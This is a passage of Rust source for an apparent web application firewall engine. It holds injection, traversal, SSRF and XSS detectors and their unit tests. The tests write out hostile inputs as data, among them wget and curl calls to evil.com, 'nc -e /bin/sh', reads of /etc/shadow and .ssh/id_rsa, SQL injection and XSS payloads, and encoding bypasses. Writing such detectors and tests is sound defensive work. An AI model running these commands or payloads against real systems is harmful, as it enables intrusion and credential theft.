Some(&score.to_string()),
trace,
rule_id,
depth + 1,
),
None => score > 0,
}
}
fn eval_path_traversal_analyzer(
&self,
condition: &MatchCondition,
value: Option<&str>,
ctx: &EvalContext,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
let Some(value) = value else {
return false;
};
let score = path_traversal_analyzer_score(value);
match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
Some(child) => self.eval_condition(
child,
ctx,
Some(&score.to_string()),
trace,
rule_id,
depth + 1,
),
None => score > 0,
}
}
fn eval_ssrf_analyzer(
&self,
condition: &MatchCondition,
value: Option<&str>,
ctx: &EvalContext,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
let Some(value) = value else {
return false;
};
let score = ssrf_analyzer_score(value);
match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
Some(child) => self.eval_condition(
child,
ctx,
Some(&score.to_string()),
trace,
rule_id,
depth + 1,
),
None => score > 0,
}
}
fn eval_nosql_analyzer(
&self,
condition: &MatchCondition,
value: Option<&str>,
ctx: &EvalContext,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
let Some(value) = value else {
return false;
};
let score = nosql_analyzer_score(value);
match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
Some(child) => self.eval_condition(
child,
ctx,
Some(&score.to_string()),
trace,
rule_id,
depth + 1,
),
None => score > 0,
}
}
fn eval_parse_multipart(
&self,
condition: &MatchCondition,
ctx: &EvalContext,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) else {
return false;
};
let raw_bytes: &[u8] = if let Some(body_text) = ctx.body_text {
body_text.as_bytes()
} else if let Some(raw) = ctx.raw_body {
raw
} else {
return false;
};
let content_type = ctx.headers.get("content-type").copied().unwrap_or("");
let Some(boundary) = extract_multipart_boundary(content_type) else {
return false;
};
let values = parse_multipart_values(raw_bytes, &boundary);
for part_value in &values {
if self.eval_condition(child, ctx, Some(part_value), trace, rule_id, depth + 1) {
return true;
}
}
false
}
fn eval_track_by_ip(
&self,
condition: &MatchCondition,
ctx: &EvalContext,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) else {
return false;
};
self.process_track_condition(child, ctx, Vec::new(), trace, rule_id, depth + 1)
}
fn eval_extract_argument(
&self,
condition: &MatchCondition,
ctx: &EvalContext,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
let selector = condition.selector.as_deref();
let extracted = select_argument_values(self, selector, ctx);
if extracted.is_empty() {
return false;
}
match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
Some(child) => {
self.process_track_condition(child, ctx, extracted, trace, rule_id, depth + 1)
}
None => true,
}
}
fn eval_unique_count(
&self,
condition: &MatchCondition,
ctx: &EvalContext,
value: Option<&str>,
values: &[String],
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
let timeframe = condition.timeframe.unwrap_or(60);
let trace_label = "unique_count";
let values_to_record: Vec<String> = if !values.is_empty() {
values.to_vec()
} else if let Some(v) = value {
vec![v.to_string()]
} else {
Vec::new()
};
let unique_count = {
let mut store = self.store.write();
if values_to_record.is_empty() {
store.get_unique_count(ctx.ip, trace_label, timeframe)
} else {
store.record_unique_values(ctx.ip, trace_label, &values_to_record, timeframe)
}
};
if let Some(mv) = condition.match_value.as_ref() {
if let Some(child) = mv.as_cond() {
return self.eval_condition(
child,
ctx,
Some(&unique_count.to_string()),
trace,
rule_id,
depth + 1,
);
}
if let Some(num) = mv.as_num() {
return unique_count as f64 >= num;
}
}
if let Some(count) = condition.count {
unique_count as u64 >= count
} else {
unique_count > 0
}
}
fn eval_count(
&self,
condition: &MatchCondition,
ctx: &EvalContext,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
let timeframe = condition.timeframe.unwrap_or(60);
let trace_label = "count";
if let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) {
if !self.eval_condition(child, ctx, None, trace, rule_id, depth + 1) {
return false;
}
}
let count = {
let mut store = self.store.write();
store.record_event(ctx.ip, trace_label, timeframe)
};
let threshold = condition.count.unwrap_or(1);
count as u64 >= threshold
}
fn process_track_condition(
&self,
condition: &MatchCondition,
ctx: &EvalContext,
values: Vec<String>,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
match condition.kind.as_str() {
"extract_argument" => {
let selector = condition.selector.as_deref();
let extracted = select_argument_values(self, selector, ctx);
if extracted.is_empty() {
return false;
}
match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
Some(child) => self.process_track_condition(
child,
ctx,
extracted,
trace,
rule_id,
depth + 1,
),
None => {
let mut store = self.store.write();
store.record_unique_values(ctx.ip, "extract", &extracted, 60);
true
}
}
}
"unique_count" => {
self.eval_unique_count(condition, ctx, None, &values, trace, rule_id, depth + 1)
}
"count" => self.eval_count(condition, ctx, trace, rule_id, depth + 1),
_ => {
let candidate = values.first().map(|s| s.as_str());
self.eval_condition(condition, ctx, candidate, trace, rule_id, depth + 1)
}
}
}
}
fn compute_available_features(ctx: &EvalContext) -> u16 {
let mut out = 0u16;
if !ctx.args.is_empty() {
out |= REQ_ARGS;
}
if !ctx.arg_entries.is_empty() {
out |= REQ_ARG_ENTRIES;
}
let has_body = ctx.body_text.is_some() || ctx.raw_body.is_some();
if has_body {
out |= REQ_BODY;
}
if ctx.json_text.is_some() {
out |= REQ_JSON;
}
out
}
fn compute_request_header_mask(index: &RuleIndex, headers: &HashMap<String, &str>) -> u64 {
let mut mask = 0u64;
for (bit, header) in index.header_bits.iter().enumerate() {
if bit >= 64 {
break;
}
if headers.contains_key(header) {
mask |= 1u64 << bit;
}
}
mask
}
fn get_header_value<'a>(headers: &'a HashMap<String, &'a str>, field: &str) -> Option<&'a str> {
let key = field.to_ascii_lowercase();
headers
.get(&key)
.copied()
.or_else(|| headers.get(field).copied())
}
fn eval_contains(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
let Some(value) = value else {
return false;
};
let Some(s) = match_value.and_then(|m| m.as_str()) else {
return false;
};
value.contains(s)
}
fn eval_starts_with(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
let Some(value) = value else {
return false;
};
let Some(s) = match_value.and_then(|m| m.as_str()) else {
return false;
};
value.starts_with(s)
}
fn eval_equals(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
let Some(value) = value else {
return false;
};
let Some(s) = match_value.and_then(|m| m.as_str()) else {
return false;
};
value == s
}
fn eval_multiple_contains(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
let Some(value) = value else {
return false;
};
let Some(arr) = match_value.and_then(|m| m.as_arr()) else {
return false;
};
for item in arr {
if let Some(s) = item.as_str() {
if value.contains(s) {
return true;
}
}
}
false
}
fn eval_hashset(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
let Some(value) = value else {
return false;
};
let Some(arr) = match_value.and_then(|m| m.as_arr()) else {
return false;
};
for item in arr {
if let Some(s) = item.as_str() {
if s.eq_ignore_ascii_case(value) {
return true;
}
}
}
false
}
fn eval_compare(condition: &MatchCondition, candidate: Option<&str>) -> bool {
let Some(candidate) = candidate else {
return false;
};
let Ok(candidate_num) = candidate.parse::<f64>() else {
return false;
};
let Some(target) = condition.match_value.as_ref().and_then(|m| m.as_num()) else {
return false;
};
let op = condition.op.as_deref().unwrap_or("eq");
match op {
"gte" => candidate_num >= target,
"lte" => candidate_num <= target,
"gt" => candidate_num > target,
"lt" => candidate_num < target,
"eq" => candidate_num == target,
_ => false,
}
}
fn eval_count_odd(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
let Some(value) = value else {
return false;
};
let Some(needle) = match_value.and_then(|m| m.as_str()) else {
return false;
};
if needle.is_empty() {
return false;
}
let count = value.matches(needle).count();
count % 2 == 1
}
fn sql_analyzer_score(value: &str) -> u32 {
if SQL_KEYWORDS.is_match(value)
|| SQL_PHRASES.is_match(value)
|| SQL_OR_AND_EQ.is_match(value)
|| SQL_COMMENT_1.is_match(value)
|| SQL_COMMENT_2.is_match(value)
|| SQL_SHUTDOWN.is_match(value)
{
1
} else {
0
}
}
fn cmd_analyzer_score(value: &str) -> u32 {
if check_cmd_patterns(value) {
return 1;
}
let decoded = safe_percent_decode(value);
if decoded != value && check_cmd_patterns(&decoded) {
return 1;
}
if decoded.contains('%') {
let double_decoded = safe_percent_decode(&decoded);
if double_decoded != decoded && check_cmd_patterns(&double_decoded) {
return 1;
}
}
0
}
#[inline]
fn check_cmd_patterns(value: &str) -> bool {
CMD_BACKTICK.is_match(value)
|| CMD_SUBSHELL.is_match(value)
|| CMD_DANGEROUS.is_match(value)
|| CMD_IFS.is_match(value)
|| CMD_VAR_SUBST.is_match(value)
|| CMD_NEWLINE_LITERAL.is_match(value)
|| CMD_NEWLINE_ENCODED.is_match(value)
|| CMD_NULL_BYTE.is_match(value)
|| CMD_BRACE.is_match(value)
|| (CMD_CHAIN.is_match(value) && has_cmd_context(value))
|| (CMD_REDIRECT.is_match(value) && has_cmd_context(value))
|| (CMD_PATH_TRAVERSAL.is_match(value) && has_cmd_context(value))
}
#[inline]
fn has_cmd_context(value: &str) -> bool {
value.contains('`')
|| value.contains("$(")
|| value.contains("${")
|| CMD_DANGEROUS.is_match(value)
|| value.contains("/bin/")
|| value.contains("/usr/bin/")
|| value.contains("/etc/")
|| value.contains("/tmp/")
|| value.contains("/dev/")
}
fn path_traversal_analyzer_score(value: &str) -> u32 {
if check_path_traversal_patterns(value) {
return 1;
}
let decoded = safe_percent_decode(value);
if decoded != value && check_path_traversal_patterns(&decoded) {
return 1;
}
if decoded.contains('%') {
let double_decoded = safe_percent_decode(&decoded);
if double_decoded != decoded && check_path_traversal_patterns(&double_decoded) {
return 1;
}
if double_decoded.contains('%') {
let triple_decoded = safe_percent_decode(&double_decoded);
if triple_decoded != double_decoded && check_path_traversal_patterns(&triple_decoded) {
return 1;
}
}
}
let normalized = normalize_unicode_path(value);
if normalized != value && check_path_traversal_patterns(&normalized) {
return 1;
}
0
}
#[inline]
fn check_path_traversal_patterns(value: &str) -> bool {
PATH_TRAV_BASIC.is_match(value)
|| PATH_TRAV_ENCODED.is_match(value)
|| PATH_TRAV_DOUBLE.is_match(value)
|| PATH_TRAV_UNICODE.is_match(value)
|| PATH_TRAV_BACKSLASH.is_match(value)
|| PATH_TRAV_NULL.is_match(value)
|| (has_traversal_context(value) && check_sensitive_targets(value))
}
#[inline]
fn has_traversal_context(value: &str) -> bool {
value.contains("..")
|| value.contains("%2e")
|| value.contains("%2E")
|| value.contains("%c0")
|| value.contains("%C0")
}
#[inline]
fn check_sensitive_targets(value: &str) -> bool {
PATH_TRAV_TARGETS_UNIX.is_match(value) || PATH_TRAV_TARGETS_WIN.is_match(value)
}
fn normalize_unicode_path(value: &str) -> String {
let mut result = value.to_string();
result = result
.replace("%c0%ae", ".")
.replace("%C0%AE", ".")
.replace("%c0%2e", ".")
.replace("%C0%2E", ".")
.replace("%e0%80%ae", ".")
.replace("%E0%80%AE", ".");
result = result
.replace("%c0%af", "/")
.replace("%C0%AF", "/")
.replace("%e0%80%af", "/")
.replace("%E0%80%AF", "/");
result = result
.replace("%c1%9c", "\\")
.replace("%C1%9C", "\\")
.replace("%c1%1c", "\\")
.replace("%C1%1C", "\\");
result
}
fn ssrf_analyzer_score(value: &str) -> u32 {
if check_ssrf_patterns(value) {
return 1;
}
let decoded = safe_percent_decode(value);
if decoded != value && check_ssrf_patterns(&decoded) {
return 1;
}
if decoded.contains('%') {
let double_decoded = safe_percent_decode(&decoded);
if double_decoded != decoded && check_ssrf_patterns(&double_decoded) {
return 1;
}
}
0
}
#[inline]
fn check_ssrf_patterns(value: &str) -> bool {
SSRF_DANGEROUS_SCHEME.is_match(value)
|| SSRF_CLOUD_METADATA.is_match(value)
|| SSRF_METADATA_HOST.is_match(value)
|| SSRF_LOCALHOST_V4.is_match(value)
|| SSRF_LOCALHOST_V6.is_match(value)
|| SSRF_MAPPED_IPV6.is_match(value)
|| SSRF_PRIVATE_IP.is_match(value)
|| SSRF_LINK_LOCAL.is_match(value)
|| SSRF_ENCODED_IP.is_match(value)
}
fn nosql_analyzer_score(value: &str) -> u32 {
if check_nosql_patterns(value) {
return 1;
}
let decoded = safe_percent_decode(value);
if decoded != value && check_nosql_patterns(&decoded) {
return 1;
}
if decoded.contains('%') {
let double_decoded = safe_percent_decode(&decoded);
if double_decoded != decoded && check_nosql_patterns(&double_decoded) {
return 1;
}
}
0
}
#[inline]
fn check_nosql_patterns(value: &str) -> bool {
if NOSQL_WHERE_JS.is_match(value) {
return true;
}
if NOSQL_AUTH_BYPASS.is_match(value) {
return true;
}
if JSON_PROTO_POLLUTION.is_match(value) {
return true;
}
NOSQL_MONGO_OPERATORS.is_match(value)
|| NOSQL_AGGREGATION.is_match(value)
|| NOSQL_COUCHDB.is_match(value)
|| NOSQL_REDIS.is_match(value)
|| NOSQL_CASSANDRA.is_match(value)
}
fn xss_analyzer_score(value: &str) -> u32 {
if check_xss_patterns(value) {
return 1;
}
let decoded = decode_html_entities(value);
if decoded != value && check_xss_patterns(&decoded) {
return 1;
}
if decoded.contains('&') {
let double_decoded = decode_html_entities(&decoded);
if double_decoded != decoded && check_xss_patterns(&double_decoded) {
return 1;
}
}
0
}
#[inline]
fn check_xss_patterns(value: &str) -> bool {
XSS_SCRIPT.is_match(value)
|| XSS_JS_SCHEME.is_match(value)
|| XSS_ON_ATTR.is_match(value)
|| XSS_COOKIE.is_match(value)
|| XSS_IMG_SRC.is_match(value)
}
fn decode_html_entities(value: &str) -> String {
if !value.contains('&') {
return value.to_string();
}
let mut result = String::with_capacity(value.len());
let mut chars = value.chars().peekable();
while let Some(c) = chars.next() {
if c == '&' {
let mut entity = String::new();
let mut found_semicolon = false;
for _ in 0..10 {
match chars.peek() {
Some(';') => {
chars.next();
found_semicolon = true;
break;
}
Some(&ch) if ch.is_ascii_alphanumeric() || ch == '#' => {
if let Some(next) = chars.next() {
entity.push(next);
} else {
break;
}
}
_ => break,
}
}
if found_semicolon && !entity.is_empty() {
if let Some(decoded) = decode_single_entity(&entity) {
result.push(decoded);
continue;
}
}
result.push('&');
result.push_str(&entity);
if found_semicolon {
result.push(';');
}
} else {
result.push(c);
}
}
result
}
fn decode_single_entity(entity: &str) -> Option<char> {
if let Some(num_str) = entity.strip_prefix('#') {
if let Some(hex_str) = num_str
.strip_prefix('x')
.or_else(|| num_str.strip_prefix('X'))
{
if let Ok(code) = u32::from_str_radix(hex_str, 16) {
return char::from_u32(code);
}
} else if let Ok(code) = num_str.parse::<u32>() {
return char::from_u32(code);
}
return None;
}
match entity {
"lt" => Some('<'),
"gt" => Some('>'),
"amp" => Some('&'),
"quot" => Some('"'),
"apos" => Some('\''),
"nbsp" => Some('\u{00A0}'),
"tab" | "Tab" => Some('\t'),
"newline" | "NewLine" => Some('\n'),
"colon" => Some(':'),
"sol" => Some('/'),
"equals" => Some('='),
"lpar" => Some('('),
"rpar" => Some(')'),
"lsqb" | "lbrack" => Some('['),
"rsqb" | "rbrack" => Some(']'),
"lcub" | "lbrace" => Some('{'),
"rcub" | "rbrace" => Some('}'),
"semi" => Some(';'),
"comma" => Some(','),
"period" | "dot" => Some('.'),
"excl" => Some('!'),
"quest" => Some('?'),
"num" => Some('#'),
"percnt" => Some('%'),
"plus" => Some('+'),
"minus" | "dash" => Some('-'),
"ast" | "midast" => Some('*'),
"verbar" | "vert" => Some('|'),
"bsol" => Some('\\'),
"circ" => Some('^'),
"grave" => Some('`'),
"tilde" => Some('~'),
"at" => Some('@'),
_ => None,
}
}
fn safe_percent_decode(value: &str) -> String {
let replaced = value.replace('+', " ");
percent_decode_str(&replaced)
.decode_utf8()
.map(|c| c.into_owned())
.unwrap_or_else(|_| value.to_string())
}
fn decode_if_base64(value: &str) -> String {
let sanitized = value.trim();
if sanitized.len() < 8 {
return value.to_string();
}
if let Ok(bytes) = BASE64_STANDARD.decode(sanitized.as_bytes()) {
if let Ok(decoded) = String::from_utf8(bytes) {
if !decoded.is_empty() {
return decoded;
}
}
}
use base64::engine::general_purpose::URL_SAFE_NO_PAD;
if let Ok(bytes) = URL_SAFE_NO_PAD.decode(sanitized.as_bytes()) {
if let Ok(decoded) = String::from_utf8(bytes) {
if !decoded.is_empty() {
return decoded;
}
}
}
value.to_string()
}
fn build_raw_request(ctx: &EvalContext) -> String {
let mut out = String::new();
out.push_str(&format!("{} {} HTTP/1.1", ctx.method, ctx.url));
out.push('\n');
for (key, value) in &ctx.headers {
out.push_str(key);
out.push_str(": ");
out.push_str(value);
out.push('\n');
}
out.push('\n');
if let Some(body) = ctx.body_text {
out.push_str(body);
}
out
}
fn extract_multipart_boundary(content_type: &str) -> Option<String> {
content_type
.split(';')
.map(|p| p.trim())
.find_map(|p| {
let (key, value) = p.split_once('=')?;
if key.trim().eq_ignore_ascii_case("boundary") {
Some(value.trim().trim_matches('"').to_string())
} else {
None
}
})
.filter(|b| !b.is_empty())
}
fn parse_multipart_values(raw_body: &[u8], boundary: &str) -> Vec<String> {
let body = String::from_utf8_lossy(raw_body);
let marker = format!("--{}", boundary);
let mut out = Vec::new();
for part in body.split(&marker) {
let mut p = part.trim_matches('\r').trim_matches('\n').trim();
if p.is_empty() || p == "--" {
continue;
}
if p.starts_with("--") {
continue;
}
if p.starts_with("\r\n") {
p = &p[2..];
}
if let Some((_, rest)) = p.split_once("\r\n\r\n") {
let value = rest.trim_end_matches("\r\n").trim().to_string();
if !value.is_empty() {
out.push(value);
}
}
}
out
}
fn select_argument_values(
engine: &Engine,
selector: Option<&MatchCondition>,
ctx: &EvalContext,
) -> Vec<String> {
let mut values = Vec::new();
for entry in &ctx.arg_entries {
if selector
.map(|sel| matches_selector(engine, sel, &entry.key))
.unwrap_or(true)
{
values.push(entry.value.clone());
}
}
values
}
fn matches_selector(engine: &Engine, selector: &MatchCondition, candidate: &str) -> bool {
match selector.kind.as_str() {
"to_lowercase" => {
let lowered = candidate.to_lowercase();
selector
.match_value
.as_ref()
.and_then(|m| m.as_cond())
.map(|child| matches_selector(engine, child, &lowered))
.unwrap_or(true)
}
"regex" => engine.eval_regex(selector.match_value.as_ref(), Some(candidate)),
"hashset" => eval_hashset(selector.match_value.as_ref(), Some(candidate)),
"multiple_contains" => {
eval_multiple_contains(selector.match_value.as_ref(), Some(candidate))
}
"contains" => eval_contains(selector.match_value.as_ref(), Some(candidate)),
"equals" => eval_equals(selector.match_value.as_ref(), Some(candidate)),
_ => false,
}
}
fn collect_regex_patterns(condition: &MatchCondition, out: &mut Vec<String>) {
if condition.kind == "regex" {
if let Some(MatchValue::Str(s)) = condition.match_value.as_ref() {
out.push(s.clone());
}
}
if let Some(mv) = condition.match_value.as_ref() {
if let Some(child) = mv.as_cond() {
collect_regex_patterns(child, out);
} else if let Some(arr) = mv.as_arr() {
for item in arr {
if let Some(child) = item.as_cond() {
collect_regex_patterns(child, out);
}
}
}
}
if let Some(selector) = condition.selector.as_ref() {
collect_regex_patterns(selector, out);
}
}
fn collect_word_values(condition: &MatchCondition, out: &mut Vec<String>) {
if condition.kind == "word" {
if let Some(MatchValue::Str(s)) = condition.match_value.as_ref() {
out.push(s.clone());
}
}
if let Some(mv) = condition.match_value.as_ref() {
if let Some(child) = mv.as_cond() {
collect_word_values(child, out);
} else if let Some(arr) = mv.as_arr() {
for item in arr {
if let Some(child) = item.as_cond() {
collect_word_values(child, out);
}
}
}
}
if let Some(selector) = condition.selector.as_ref() {
collect_word_values(selector, out);
}
}
#[cfg(test)]
mod tests {
use super::*;
use crate::waf::types::Header;
#[test]
fn test_empty_engine() {
let engine = Engine::empty();
assert_eq!(engine.rule_count(), 0);
}
#[test]
fn test_load_rules() {
let mut engine = Engine::empty();
let rules = r#"[
{
"id": 1,
"description": "SQL injection",
"risk": 10.0,
"blocking": true,
"matches": [
{"type": "uri", "match": {"type": "contains", "match": "' OR '"}}
]
}
]"#;
let count = engine.load_rules(rules.as_bytes()).unwrap();
assert_eq!(count, 1);
}
#[test]
fn test_analyze_sqli() {
let mut engine = Engine::empty();
let rules = r#"[
{
"id": 1,
"description": "SQL injection",
"risk": 10.0,
"blocking": true,
"matches": [
{"type": "uri", "match": {"type": "contains", "match": "' OR '"}}
]
}
]"#;
engine.load_rules(rules.as_bytes()).unwrap();
let verdict = engine.analyze(&Request {
method: "GET",
path: "/api/users?id=1' OR '1'='1",
..Default::default()
});
assert_eq!(verdict.action, Action::Block);
assert!(verdict.risk_score > 0);
assert!(verdict.matched_rules.contains(&1));
}
#[test]
fn test_sql_analyzer() {
assert!(sql_analyzer_score("SELECT * FROM users") > 0);
assert!(sql_analyzer_score("SELECT * FROM information_schema") > 0);
assert!(sql_analyzer_score("INSERT INTO users") > 0);
assert!(sql_analyzer_score("DELETE FROM users") > 0);
assert!(sql_analyzer_score("UNION SELECT * FROM users") > 0);
assert!(sql_analyzer_score("admin' --") > 0);
assert!(sql_analyzer_score("hello world") == 0);
assert!(sql_analyzer_score("normal query string") == 0);
}
#[test]
fn test_xss_analyzer() {
assert!(xss_analyzer_score("<script>alert(1)</script>") > 0);
assert!(xss_analyzer_score("javascript:alert(1)") > 0);
assert!(xss_analyzer_score("onclick=alert(1)") > 0);
assert!(xss_analyzer_score("hello world") == 0);
}
#[test]
fn test_xss_analyzer_html_entity_bypass() {
assert!(
xss_analyzer_score("<script>alert(1)</script>") > 0,
"Should detect <script> via decimal entities"
);
assert!(
xss_analyzer_score("<script>alert(1)</script>") > 0,
"Should detect <script> via hex entities"
);
assert!(
xss_analyzer_score("<script>alert(1)</script>") > 0,
"Should detect <script> via named entities"
);
assert!(
xss_analyzer_score("<script>alert(1)</script>") > 0,
"Should detect <script> via mixed entities"
);
assert!(
xss_analyzer_score(
"javascript:alert(1)"
) > 0,
"Should detect javascript: via decimal entities"
);
assert!(
xss_analyzer_score("onerror=alert(1)") > 0,
"Should detect onerror via decimal entities"
);
assert!(
xss_analyzer_score("document.cookie") > 0,
"Should detect document.cookie via decimal entities"
);
assert!(
xss_analyzer_score("<script>") > 0,
"Should detect script tag with uppercase hex"
);
assert!(
xss_analyzer_score("<img src=x onerror=alert(1)>") > 0,
"Should detect img tag via entities"
);
}
#[test]
fn test_decode_html_entities() {
assert_eq!(decode_html_entities("<"), "<");
assert_eq!(decode_html_entities(">"), ">");
assert_eq!(decode_html_entities("<script>"), "<script>");
assert_eq!(decode_html_entities("<"), "<");
assert_eq!(decode_html_entities(">"), ">");
assert_eq!(decode_html_entities("<script>"), "<script>");
assert_eq!(decode_html_entities("<"), "<");
assert_eq!(decode_html_entities(">"), ">");
assert_eq!(decode_html_entities("&"), "&");
assert_eq!(decode_html_entities("""), "\"");
assert_eq!(decode_html_entities("'"), "'");
assert_eq!(decode_html_entities("hello <world>"), "hello <world>");
assert_eq!(decode_html_entities("no entities here"), "no entities here");
assert_eq!(decode_html_entities("&unknown;"), "&unknown;");
assert_eq!(decode_html_entities("&;"), "&;");
assert_eq!(decode_html_entities("<"), "<");
}
#[test]
fn test_xss_double_encoding_bypass() {
assert!(
xss_analyzer_score("&#60;script&#62;") > 0,
"Should detect double-encoded script tag"
);
}
#[test]
fn test_cmd_analyzer() {
assert!(
cmd_analyzer_score(r"`cat /etc/passwd`") > 0,
"Should detect backtick execution"
);
assert!(
cmd_analyzer_score(r"`id`") > 0,
"Should detect simple backtick"
);
assert!(
cmd_analyzer_score(r"$(cat /etc/passwd)") > 0,
"Should detect subshell execution"
);
assert!(
cmd_analyzer_score(r"$(whoami)") > 0,
"Should detect simple subshell"
);
assert!(
cmd_analyzer_score(r"${PATH}") > 0,
"Should detect variable substitution"
);
assert!(
cmd_analyzer_score(r"${IFS}") > 0,
"Should detect IFS substitution"
);
assert!(cmd_analyzer_score(r"$IFS") > 0, "Should detect $IFS");
assert!(
cmd_analyzer_score(r"IFS=x") > 0,
"Should detect IFS assignment"
);
assert!(
cmd_analyzer_score(r"cat /etc/passwd") > 0,
"Should detect /etc/passwd access"
);
assert!(
cmd_analyzer_score(r"cat /etc/shadow") > 0,
"Should detect /etc/shadow access"
);
assert!(
cmd_analyzer_score(r"wget http://evil.com/shell.sh") > 0,
"Should detect wget"
);
assert!(
cmd_analyzer_score(r"curl http://evil.com") > 0,
"Should detect curl"
);
assert!(
cmd_analyzer_score(r"nc -e /bin/sh") > 0,
"Should detect netcat"
);
assert!(cmd_analyzer_score(r"bash -i") > 0, "Should detect bash -i");
assert!(
cmd_analyzer_score(r"/bin/sh -c 'cmd'") > 0,
"Should detect /bin/sh -c"
);
assert!(
cmd_analyzer_score("hello world") == 0,
"Clean value should not match"
);
assert!(
cmd_analyzer_score("user@example.com") == 0,
"Email should not match"
);
}
#[test]
fn test_cmd_analyzer_newline_bypass() {
assert!(
cmd_analyzer_score("id%0acat /etc/passwd") > 0,
"Should detect %0a newline injection"
);
assert!(
cmd_analyzer_score("cmd%0dmore") > 0,
"Should detect %0d carriage return injection"
);
assert!(
cmd_analyzer_score("%0A%0D") > 0,
"Should detect uppercase encoded CRLF"
);
assert!(
cmd_analyzer_score("id%250acat") > 0,
"Should detect double-encoded newline"
);
}
#[test]
fn test_cmd_analyzer_ifs_bypass() {
assert!(
cmd_analyzer_score(r"cat${IFS}/etc/passwd") > 0,
"Should detect $IFS brace bypass"
);
assert!(
cmd_analyzer_score(r"cat$IFS/etc/passwd") > 0,
"Should detect $IFS bypass"
);
assert!(
cmd_analyzer_score(r"{cat,/etc/passwd}") > 0,
"Should detect brace expansion"
);
}
#[test]
fn test_cmd_analyzer_null_byte() {
assert!(
cmd_analyzer_score("file.txt%00.jpg") > 0,
"Should detect %00 null byte"
);
assert!(
cmd_analyzer_score("cmd\\x00param") > 0,
"Should detect \\x00 null byte"
);
}
#[test]
fn test_path_traversal_analyzer_basic() {
assert!(
path_traversal_analyzer_score("../etc/passwd") > 0,
"Should detect basic ../"
);
assert!(
path_traversal_analyzer_score("..\\Windows\\System32") > 0,
"Should detect basic ..\\"
);
assert!(
path_traversal_analyzer_score("....//etc/passwd") > 0,
"Should detect multiple dots"
);
assert!(
path_traversal_analyzer_score("/home/user/file.txt") == 0,
"Clean path should not match"
);
assert!(
path_traversal_analyzer_score("relative/path/to/file") == 0,
"Relative path without traversal should not match"
);
}
#[test]
fn test_path_traversal_url_encoding_bypass() {
assert!(
path_traversal_analyzer_score("%2e%2e%2fetc/passwd") > 0,
"Should detect %2e%2e%2f (URL-encoded ../)"
);
assert!(
path_traversal_analyzer_score("..%2fetc/passwd") > 0,
"Should detect ..%2f (partial encoding)"
);
assert!(
path_traversal_analyzer_score("%2e%2e/etc/passwd") > 0,
"Should detect %2e%2e/ (partial encoding)"
);
assert!(
path_traversal_analyzer_score("%2E%2E%2Fetc/passwd") > 0,
"Should detect uppercase %2E%2E%2F"
);
}
#[test]
fn test_path_traversal_double_encoding_bypass() {
assert!(
path_traversal_analyzer_score("%252e%252e%252fetc/passwd") > 0,
"Should detect double-encoded %252e%252e%252f"
);
assert!(
path_traversal_analyzer_score("%252E%252E%252F") > 0,
"Should detect uppercase double-encoded"
);
assert!(
path_traversal_analyzer_score("%25252e%25252e%25252f") > 0,
"Should detect triple-encoded path traversal"
);
}
#[test]
fn test_path_traversal_unicode_bypass() {
assert!(
path_traversal_analyzer_score("%c0%ae%c0%ae/etc/passwd") > 0,
"Should detect overlong UTF-8 %c0%ae (dot)"
);
assert!(
path_traversal_analyzer_score("..%c0%afetc/passwd") > 0,
"Should detect overlong UTF-8 %c0%af (slash)"
);
assert!(
path_traversal_analyzer_score("%c0%ae%c0%ae%c0%afetc%c0%afpasswd") > 0,
"Should detect mixed overlong encoding"
);
}
#[test]
fn test_path_traversal_windows_patterns() {
assert!(
path_traversal_analyzer_score("..\\..\\boot.ini") > 0,
"Should detect Windows backslash traversal"
);
assert!(
path_traversal_analyzer_score("%2e%2e%5c") > 0,
"Should detect %5c (encoded backslash)"
);
assert!(
path_traversal_analyzer_score("..\\..\\Windows\\System32\\config\\SAM") > 0,
"Should detect SAM file access"
);
assert!(
path_traversal_analyzer_score("..\\..\\boot.ini") > 0,
"Should detect boot.ini access"
);
}
#[test]
fn test_path_traversal_unix_sensitive_targets() {
assert!(
path_traversal_analyzer_score("../../etc/passwd") > 0,
"Should detect /etc/passwd access"
);
assert!(
path_traversal_analyzer_score("..%2f..%2fetc%2fshadow") > 0,
"Should detect encoded /etc/shadow access"
);
assert!(
path_traversal_analyzer_score("../../.ssh/id_rsa") > 0,
"Should detect .ssh access"
);
assert!(
path_traversal_analyzer_score("../../proc/self/environ") > 0,
"Should detect /proc access"
);
}
#[test]
fn test_path_traversal_null_byte() {
assert!(
path_traversal_analyzer_score("../etc/passwd%00.jpg") > 0,
"Should detect null byte truncation"
);
assert!(
path_traversal_analyzer_score("file.txt\\x00../etc/passwd") > 0,
"Should detect \\x00 null byte"
);
}
#[test]
fn test_normalize_unicode_path() {
assert_eq!(normalize_unicode_path("%c0%ae"), ".");
assert_eq!(normalize_unicode_path("%C0%AE"), ".");
assert_eq!(normalize_unicode_path("%e0%80%ae"), ".");
assert_eq!(normalize_unicode_path("%c0%af"), "/");
assert_eq!(normalize_unicode_path("%C0%AF"), "/");
assert_eq!(normalize_unicode_path("%c1%9c"), "\\");
assert_eq!(normalize_unicode_path("%C1%9C"), "\\");
assert_eq!(normalize_unicode_path("%c0%ae%c0%ae%c0%af"), "../");
}
#[test]
fn test_ssrf_analyzer_localhost() {
assert!(
ssrf_analyzer_score("http://127.0.0.1/") > 0,
"Should detect 127.0.0.1"
);
assert!(
ssrf_analyzer_score("http://127.0.0.2/admin") > 0,
"Should detect 127.0.0.x"
);
